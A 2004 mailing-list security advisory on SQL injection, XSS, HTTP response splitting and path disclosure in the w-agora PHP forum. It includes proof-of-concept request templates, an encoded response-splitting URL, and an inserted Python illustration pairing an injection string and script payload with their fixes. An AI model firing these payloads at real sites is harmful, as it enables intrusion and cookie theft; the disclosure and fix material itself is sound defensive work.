Multiple vulnerabilities in w-agora forum

From: Alexander Antipov (antipov_at_SecurityLab.ru)
Date: 09/30/04

  • Next message: Martin Schulze: "[SECURITY] [DSA 555-1] New frenet6 packages fix potential information leak"
    To: <full-disclosure@lists.netsys.com>
    Date: Thu, 30 Sep 2004 12:41:17 +0400
    
    

    http://www.maxpatrol.com/mp_advisory.asp

    Title: Multiple vulnerabilities in w-agora forum
    Date: 28.09.04
    Severity: Medium
    Application: w-agora 4.1.6a, http://www.w-agora/en/download.php
    Platform: PHP
     
     I. DESCRIPTION
     
     Multiple vulnerabilities were found in the w-agora forum. A remote user
     can conduct SQL injection, HTTP response splitting and cross-site
     scripting attacks, and can obtain the installation path of the scripts.

     1. SQL injection
     
    redir_url.php?bn=demos_links&key=[SQL]
     
     2. XSS in GET:

     download_thread.php?site=support&bn=support_install&thread=[XSS code here]
     
     3. XSS in POST:

     
     POST /login.php HTTP/1.1
     Host: w-agora
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 89

     loginform=1&redirect_url=1&loginuser=[XSS code here]&loginpassword=1
     
      
      POST /forgot_password.php HTTP/1.1
     Host: w-agora
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 48

     go=1&userid=[XSS code here]
     
      
     4. HTTP response splitting
     
     /subscribe_thread.php?site=support&bn=support_install&thread=%0d%0aContent-Length:%200%0d%0a%0d%0a%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2034%0d%0a%0d%0a%3chtml%3eScanned%20by%20PTsecurity%3c/html%3e%0d%0a

     5. Path disclosure

     /list.php?bn=support_install&last=19&collapse=|id|
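     The following is an added, offline illustration of findings 1, 2/3 and 4 above; it is not w-agora code and the table name, column names and handler functions are assumptions standing in for the unknown application code. It shows the string-built query that `key=[SQL]` implies next to its parameterised form, the HTML escaping that stops a reflected `loginuser`/`thread` value from executing, and how the `thread` payload of finding 4 decodes into a second, attacker-written HTTP response once a CR/LF reaches a header, together with the check that rejects it.

```python
"""Vulnerable pattern beside the check that closes it, for each finding.
Added example (not w-agora's code); schema and handler names are hypothetical.
"""
import html
import sqlite3
from urllib.parse import parse_qs, urlsplit


# --- 1. SQL injection: redir_url.php?bn=...&key=[SQL] -----------------------
def demo_db():
    """In-memory stand-in for the forum database (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE redirects (key_name TEXT, url TEXT)")
    conn.executemany(
        "INSERT INTO redirects VALUES (?, ?)",
        [("demos", "http://example.invalid/demos"),
         ("admin", "http://example.invalid/admin")],
    )
    return conn


def lookup_key_vulnerable(conn, key):
    # The request parameter is pasted into the statement text.
    sql = "SELECT url FROM redirects WHERE key_name = '%s'" % key
    return [row[0] for row in conn.execute(sql)]


def lookup_key_safe(conn, key):
    # Bound parameter: the value can never change the statement's structure.
    sql = "SELECT url FROM redirects WHERE key_name = ?"
    return [row[0] for row in conn.execute(sql, (key,))]


# --- 2/3. Reflected XSS: loginuser / userid echoed back into the page -------
def render_login_error(loginuser):
    # Escape on output; '<', '>', '&' and quotes become entities.
    return "<p>Unknown user: %s</p>" % html.escape(loginuser, quote=True)


# --- 4. HTTP response splitting via the thread parameter --------------------
# The advisory's proof-of-concept URL, hostname assumed from its Host header.
POC_URL = (
    "http://w-agora/subscribe_thread.php?site=support&bn=support_install"
    "&thread=%0d%0aContent-Length:%200%0d%0a%0d%0a%20200%20OK%0d%0a"
    "Content-Type:%20text/html%0d%0aContent-Length:%2034%0d%0a%0d%0a"
    "%3chtml%3eScanned%20by%20PTsecurity%3c/html%3e%0d%0a"
)


def injected_lines(url, param="thread"):
    """Percent-decode the parameter and split it the way an HTTP client would."""
    value = parse_qs(urlsplit(url).query)[param][0]
    return value.split("\r\n")


def header_value_is_safe(value):
    """A header value must not contain a bare CR or LF."""
    return "\r" not in value and "\n" not in value


def build_redirect(thread):
    """Models header('Location: ...' . $thread); refuses to split the response."""
    if not header_value_is_safe(thread):
        raise ValueError("CR/LF in header value: possible response splitting")
    return "Location: /subscribe_thread.php?thread=" + thread


if __name__ == "__main__":
    conn = demo_db()
    print(lookup_key_vulnerable(conn, "' OR '1'='1"))   # both rows leak
    print(lookup_key_safe(conn, "' OR '1'='1"))         # nothing matches
    print(render_login_error("<script>alert(1)</script>"))
    for line in injected_lines(POC_URL):
        print(repr(line))                               # the forged 2nd response
```

     Running the block prints the decoded `thread` payload line by line: an empty line closes the real headers with `Content-Length: 0`, and everything after it (`200 OK`, `Content-Type`, the 34-byte body) is a complete response the client attributes to the server, which is what makes the technique usable for cache poisoning and script injection. The fix in `build_redirect` is the one a PHP handler needs before calling `header()`: reject or strip CR and LF rather than trying to encode them.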

    II. IMPACT
    ----------
    A remote user can access the target user's cookies (including
    authentication cookies) through the cross-site scripting flaws.
    A remote user can cause SQL commands to be executed by the underlying
    database.
    A remote user can inject arbitrary headers and content into the server's
    response (HTTP response splitting) and can obtain the installation path
    of the scripts.

    III. SOLUTION
    -------------
    A fix is available from the vendor; update to the fixed file revisions
    listed in section IV.
      

    IV. VENDOR FIX/RESPONSE
    -----------------------
    Yes. Fixed in CVS: subscribe_thread.php3 v1.17, forgot_password.php3
    v1.17, include/auth.php v1.45, list.php3 v1.53.
     

     V. CREDIT
    -------------
     These vulnerabilities were discovered by Positive Technologies using
    MaxPatrol (www.maxpatrol.com), an intelligent professional security
    scanner. It is able to detect a substantial number of vulnerabilities
    that have not yet been published. MaxPatrol's intelligent algorithms are
    also capable of detecting many vulnerabilities in custom web scripts
    (XSS, SQL and code injection, HTTP response splitting and others).

